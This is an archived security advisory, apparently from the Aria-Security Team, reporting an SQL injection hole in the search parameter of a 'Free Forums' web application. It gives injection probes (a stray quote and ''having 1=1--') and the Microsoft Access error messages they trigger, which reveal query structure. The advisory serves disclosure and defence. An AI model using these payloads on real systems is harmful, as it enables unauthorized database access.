TUCoPS :: Web BBS :: etc :: tb13413.htm

Free Forums "search" Sql Injection
Free Forums "search" Sql Injection
Free Forums "search" Sql Injection


http://Aria-Security.net=0D 
Aria-Security Team=0D
------------------------------------=0D
Free Forums Sql Injection=0D
Vendor: http://www.nvecs.com/forums=0D 
=0D
=0D
the search parameter hast an sql injection=0D
=0D
example:=0D
'having 1=1--=0D
=0D
result:=0D
=0D
[Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression '(((Responses.Response ) like '%'having 1=1--%')) Order By Topics.AddDate;'.=0D
=0D
or just a simple '=0D
=0D
=0D
[Microsoft][ODBC Microsoft Access Driver] Syntax error in query expression 'Topics.User like '%'%' Order By Topics.AddDate;'.=0D
=0D
Regards,=0D
The-0utl4w=0D
Credit Goes to Aria-Security Team

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH